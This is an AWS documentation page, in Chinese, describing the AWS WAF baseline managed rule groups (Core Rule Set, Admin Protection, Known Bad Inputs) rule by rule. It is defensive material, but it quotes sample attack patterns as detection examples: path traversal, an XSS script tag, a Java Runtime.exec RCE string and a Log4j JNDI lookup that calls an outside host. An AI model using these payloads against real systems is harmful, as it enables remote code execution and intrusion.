基准规则组 - AWS WAF、AWS Firewall Manager、AWS Shield Advanced 和 AWS Shield 网络安全分析器
核心规则集(CRS)管理保护已知错误输入

介绍 AWS WAF 的全新控制台体验

现在,您可以使用更新后的体验访问控制台中任意位置的 AWS WAF 功能。有关更多详细信息,请参阅 使用更新的控制台体验

基准规则组

基准托管规则组可针对多种常见威胁提供一般保护。请选择以下一个或多个规则组以便为您的资源建立基准保护。

核心规则集(CRS)托管规则组

供应商名称:AWS,名称:AWSManagedRulesCommonRuleSet,WCU:700

注意

本文档包含此托管规则组的最新静态版本。我们在 AWS 托管规则变更日志 的更改日志中报告版本变更。有关其他版本的信息,请使用 API 命令 DescribeManagedRuleGroup

对于 AWS 托管规则组中的规则,我们所发布的信息旨在为您提供使用规则所需的内容,同时避免恶意行为者由此得知规避规则的信息。

如果您需要更多信息,请联系 AWS 支持 中心

核心规则集 (CRS) 规则组包含通常适用于 Web 应用程序的规则。该规则组有助于防止利用各种漏洞,包括 OWASP 出版物(如 OWASP Top 10)中描述的一些高风险和经常发生的漏洞。请考虑将此规则组用于任何 AWS WAF 使用案例。

此托管规则组会为其评估的 web 请求添加标签,这些标签可供保护包(web ACL)中在此规则组之后运行的规则使用。AWS WAF 还记录与 Amazon CloudWatch 指标相关的标签。有关标签和标签指标的一般信息,请参阅 Web 请求标签标签指标和维度

规则名称 描述和标签
NoUserAgent_HEADER

检查是否存在缺少 HTTP User-Agent 标头的请求。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:NoUserAgent_Header
UserAgent_BadBots_HEADER

检查是否存在表明请求是恶意机器人的常见 User-Agent 标头值。示例模式包括 nessusnmap。有关机器人管理的信息,另请参阅 AWS WAF 机器人控制功能规则组

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:BadBots_Header
SizeRestrictions_QUERYSTRING

检查是否存在超过 2048 字节的 URI 查询字符串。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString
SizeRestrictions_Cookie_HEADER

检查是否存在超过 10,240 字节的 Cookie 标头。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header
SizeRestrictions_BODY

检查是否存在超过 8 KB(8192 字节)的请求正文。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:SizeRestrictions_Body
SizeRestrictions_URIPATH

检查 URI 路径是否超过 1024 字节。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath
EC2MetaDataSSRF_BODY

检查是否存在恶意方试图从请求正文中泄漏 Amazon EC2 元数据。

警告

此规则仅检查请求正文,但不得超过保护包(web ACL)和资源类型的正文大小限制。对于应用程序负载均衡器和 AWS AppSync,固定限制为 8 KB。对于 CloudFront、API Gateway、Amazon Cognito、App Runner 和 Verified Access,默认限制为 16 KB,您可以在保护包(web ACL)配置中将此限制提高至 64 KB。此规则使用 Continue 选项来处理超大内容。有关更多信息,请参阅 AWS WAF 中的超大 web 请求组件

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body
EC2MetaDataSSRF_COOKIE

检查是否存在恶意方试图从请求 Cookie 中泄漏 Amazon EC2 元数据。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie
EC2MetaDataSSRF_URIPATH

检查是否存在恶意方试图从请求 URI 路径中泄漏 Amazon EC2 元数据。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath
EC2MetaDataSSRF_QUERYARGUMENTS

检查是否存在恶意方试图从请求查询参数中泄漏 Amazon EC2 元数据。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments
GenericLFI_QUERYARGUMENTS

检查查询参数中是否存在本地文件包含(LFI)攻击。示例包括使用类似于 ../../ 的技术尝试遍历路径。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments
GenericLFI_URIPATH

检查 URI 路径中是否存在本地文件包含(LFI)攻击。示例包括使用类似于 ../../ 的技术尝试遍历路径。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:GenericLFI_URIPath
GenericLFI_BODY

检查请求正文中是否存在本地文件包含(LFI)攻击。示例包括使用类似于 ../../ 的技术尝试遍历路径。

警告

此规则仅检查请求正文,但不得超过保护包(web ACL)和资源类型的正文大小限制。对于应用程序负载均衡器和 AWS AppSync,固定限制为 8 KB。对于 CloudFront、API Gateway、Amazon Cognito、App Runner 和 Verified Access,默认限制为 16 KB,您可以在保护包(web ACL)配置中将此限制提高至 64 KB。此规则使用 Continue 选项来处理超大内容。有关更多信息,请参阅 AWS WAF 中的超大 web 请求组件

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:GenericLFI_Body
RestrictedExtensions_URIPATH

检查是否存在 URI 路径中包含无法安全读取或运行的系统文件扩展名的请求。示例模式包括类似于 .log.ini 的扩展名。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath
RestrictedExtensions_QUERYARGUMENTS

检查是否存在查询参数中包含无法安全读取或运行的系统文件扩展名的请求。示例模式包括类似于 .log.ini 的扩展名。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments
GenericRFI_QUERYARGUMENTS

检查所有查询参数的值,以防有人试图通过嵌入包含 IPv4 地址的 URL 在 Web 应用程序中利用 RFI(远程文件包含)。例如,在利用尝试中包含 IPv4 主机标头的 http://https://ftp://ftps://file:// 等模式。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments
GenericRFI_BODY

检查请求正文中是否有人试图通过嵌入包含 IPv4 地址的 URL 来利用 Web 应用程序中的 RFI(远程文件包含)。例如,在利用尝试中包含 IPv4 主机标头的 http://https://ftp://ftps://file:// 等模式。

警告

此规则仅检查请求正文,但不得超过保护包(web ACL)和资源类型的正文大小限制。对于应用程序负载均衡器和 AWS AppSync,固定限制为 8 KB。对于 CloudFront、API Gateway、Amazon Cognito、App Runner 和 Verified Access,默认限制为 16 KB,您可以在保护包(web ACL)配置中将此限制提高至 64 KB。此规则使用 Continue 选项来处理超大内容。有关更多信息,请参阅 AWS WAF 中的超大 web 请求组件

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:GenericRFI_Body
GenericRFI_URIPATH

检查 URI 路径中是否有人试图通过嵌入包含 IPv4 地址的 URL 来利用 Web 应用程序中的 RFI(远程文件包含)。例如,在利用尝试中包含 IPv4 主机标头的 http://https://ftp://ftps://file:// 等模式。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:GenericRFI_URIPath
CrossSiteScripting_COOKIE

使用内置 AWS WAF 跨站点脚本攻击规则语句 功能检查 Cookie 标头的值以了解常见的跨站脚本攻击(XSS)模式。示例模式包括类似于 <script>alert("hello")</script> 的脚本。

注意

该规则组的 2.0 版本未填充 AWS WAF 日志中的规则匹配详细信息。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie
CrossSiteScripting_QUERYARGUMENTS

使用内置 AWS WAF 跨站点脚本攻击规则语句 功能检查查询参数的值以了解常见的跨站脚本攻击(XSS)模式。示例模式包括类似于 <script>alert("hello")</script> 的脚本。

注意

该规则组的 2.0 版本未填充 AWS WAF 日志中的规则匹配详细信息。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments
CrossSiteScripting_BODY

使用内置 AWS WAF 跨站点脚本攻击规则语句 功能检查请求正文以了解常见的跨站脚本攻击(XSS)模式。示例模式包括类似于 <script>alert("hello")</script> 的脚本。

注意

该规则组的 2.0 版本未填充 AWS WAF 日志中的规则匹配详细信息。

警告

此规则仅检查请求正文,但不得超过保护包(web ACL)和资源类型的正文大小限制。对于应用程序负载均衡器和 AWS AppSync,固定限制为 8 KB。对于 CloudFront、API Gateway、Amazon Cognito、App Runner 和 Verified Access,默认限制为 16 KB,您可以在保护包(web ACL)配置中将此限制提高至 64 KB。此规则使用 Continue 选项来处理超大内容。有关更多信息,请参阅 AWS WAF 中的超大 web 请求组件

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body
CrossSiteScripting_URIPATH

使用内置 AWS WAF 跨站点脚本攻击规则语句 功能检查 URI 路径的值以了解常见的跨站脚本攻击(XSS)模式。示例模式包括类似于 <script>alert("hello")</script> 的脚本。

注意

该规则组的 2.0 版本未填充 AWS WAF 日志中的规则匹配详细信息。

规则操作:Block

标签:awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath

管理员保护托管规则组

供应商名称:AWS,名称:AWSManagedRulesAdminProtectionRuleSet,WCU:100

注意

本文档包含此托管规则组的最新静态版本。我们在 AWS 托管规则变更日志 的更改日志中报告版本变更。有关其他版本的信息,请使用 API 命令 DescribeManagedRuleGroup

对于 AWS 托管规则组中的规则,我们所发布的信息旨在为您提供使用规则所需的内容,同时避免恶意行为者由此得知规避规则的信息。

如果您需要更多信息,请联系 AWS 支持 中心

管理保护规则组包含允许您阻止对公开的管理页面进行外部访问的规则。如果您运行第三方软件,或者希望降低恶意人员获取您的应用程序的管理访问权限的风险,该规则组可能非常有用。

此托管规则组会为其评估的 web 请求添加标签,这些标签可供保护包(web ACL)中在此规则组之后运行的规则使用。AWS WAF 还记录与 Amazon CloudWatch 指标相关的标签。有关标签和标签指标的一般信息,请参阅 Web 请求标签标签指标和维度

规则名称 描述和标签
AdminProtection_URIPATH

检查针对通常为管理 Web 服务器或应用程序而保留的 URI 路径。示例模式包括 sqlmanager

规则操作:Block

标签:awswaf:managed:aws:admin-protection:AdminProtection_URIPath

已知错误输入托管规则组

供应商名称:AWS,名称:AWSManagedRulesKnownBadInputsRuleSet,WCU:200

注意

本文档包含此托管规则组的最新静态版本。我们在 AWS 托管规则变更日志 的更改日志中报告版本变更。有关其他版本的信息,请使用 API 命令 DescribeManagedRuleGroup

对于 AWS 托管规则组中的规则,我们所发布的信息旨在为您提供使用规则所需的内容,同时避免恶意行为者由此得知规避规则的信息。

如果您需要更多信息,请联系 AWS 支持 中心

已知错误输入规则组包含用于阻止请求模式的规则,这些模式确认无效且与漏洞攻击或发现相关联。这有助于降低恶意人员发现易受攻击的应用程序的风险。

此托管规则组会为其评估的 web 请求添加标签,这些标签可供保护包(web ACL)中在此规则组之后运行的规则使用。AWS WAF 还记录与 Amazon CloudWatch 指标相关的标签。有关标签和标签指标的一般信息,请参阅 Web 请求标签标签指标和维度

规则名称 描述和标签
JavaDeserializationRCE_HEADER

检查 HTTP 请求标头的键和值,寻找指示 Java 反序列化远程命令执行(RCE)尝试的模式,例如 Spring Core 和 Cloud Function RCE 漏洞(CVE-2022-22963、CVE-2022-22965)。示例模式包括 (java.lang.Runtime).getRuntime().exec("whoami")

警告

此规则仅检查请求标头的前 8 KB 或前 200 个标头(以先达到的限制为准),并且它使用 Continue 选项来处理超大内容。有关更多信息,请参阅 AWS WAF 中的超大 web 请求组件

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header
JavaDeserializationRCE_BODY

检查请求正文中是否存在指示 Java 反序列化远程命令执行(RCE)尝试的模式,例如 Spring Core 和 Cloud Function RCE 漏洞(CVE-2022-22963、CVE-2022-22965)。示例模式包括 (java.lang.Runtime).getRuntime().exec("whoami")

警告

此规则仅检查请求正文,但不得超过保护包(web ACL)和资源类型的正文大小限制。对于应用程序负载均衡器和 AWS AppSync,固定限制为 8 KB。对于 CloudFront、API Gateway、Amazon Cognito、App Runner 和 Verified Access,默认限制为 16 KB,您可以在保护包(web ACL)配置中将此限制提高至 64 KB。此规则使用 Continue 选项来处理超大内容。有关更多信息,请参阅 AWS WAF 中的超大 web 请求组件

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body
JavaDeserializationRCE_URIPATH

检查请求 URI 中是否存在指示 Java 反序列化远程命令执行(RCE)尝试的模式,例如 Spring Core 和 Cloud Function RCE 漏洞(CVE-2022-22963、CVE-2022-22965)。示例模式包括 (java.lang.Runtime).getRuntime().exec("whoami")

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath
JavaDeserializationRCE_QUERYSTRING

检查请求查询字符串中是否存在指示 Java 反序列化远程命令执行(RCE)尝试的模式,例如 Spring Core 和 Cloud Function RCE 漏洞(CVE-2022-22963、CVE-2022-22965)。示例模式包括 (java.lang.Runtime).getRuntime().exec("whoami")

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString
Host_localhost_HEADER

检查请求中的主机标头是否有指示本地主机的模式。示例模式包括 localhost

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header
PROPFIND_METHOD

检查请求中用于 PROPFIND 的 HTTP 方法,这是一种类似于 HEAD 的方法,但具有泄漏 XML 对象的额外意图。

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:Propfind_Method
ExploitablePaths_URIPATH

检查 URI 路径中是否有恶意方试图访问可利用的 Web 应用程序路径。示例模式包括类似于 web-inf 的路径。

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath
Log4JRCE_HEADER

检查请求标头的键和值是否存在 Log4j 漏洞(CVE-2021-44228CVE-2021-45046CVE-2021-45105),并防止远程代码执行(RCE)尝试。示例模式包括 ${jndi:ldap://example.com/}

警告

此规则仅检查请求标头的前 8 KB 或前 200 个标头(以先达到的限制为准),并且它使用 Continue 选项来处理超大内容。有关更多信息,请参阅 AWS WAF 中的超大 web 请求组件

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header
Log4JRCE_QUERYSTRING

检查查询字符串中是否存在 Log4j 漏洞(CVE-2021-44228CVE-2021-45046CVE-2021-45105),并防止远程代码执行(RCE)尝试。示例模式包括 ${jndi:ldap://example.com/}

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString
Log4JRCE_BODY

检查正文中是否存在 Log4j 漏洞(CVE-2021-44228CVE-2021-45046CVE-2021-45105),并防止远程代码执行(RCE)尝试。示例模式包括 ${jndi:ldap://example.com/}

警告

此规则仅检查请求正文,但不得超过保护包(web ACL)和资源类型的正文大小限制。对于应用程序负载均衡器和 AWS AppSync,固定限制为 8 KB。对于 CloudFront、API Gateway、Amazon Cognito、App Runner 和 Verified Access,默认限制为 16 KB,您可以在保护包(web ACL)配置中将此限制提高至 64 KB。此规则使用 Continue 选项来处理超大内容。有关更多信息,请参阅 AWS WAF 中的超大 web 请求组件

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body
Log4JRCE_URIPATH

检查 URI 路径中是否存在 Log4j 漏洞(CVE-2021-44228CVE-2021-45046CVE-2021-45105),并防止远程代码执行(RCE)尝试。示例模式包括 ${jndi:ldap://example.com/}

规则操作:Block

标签:awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath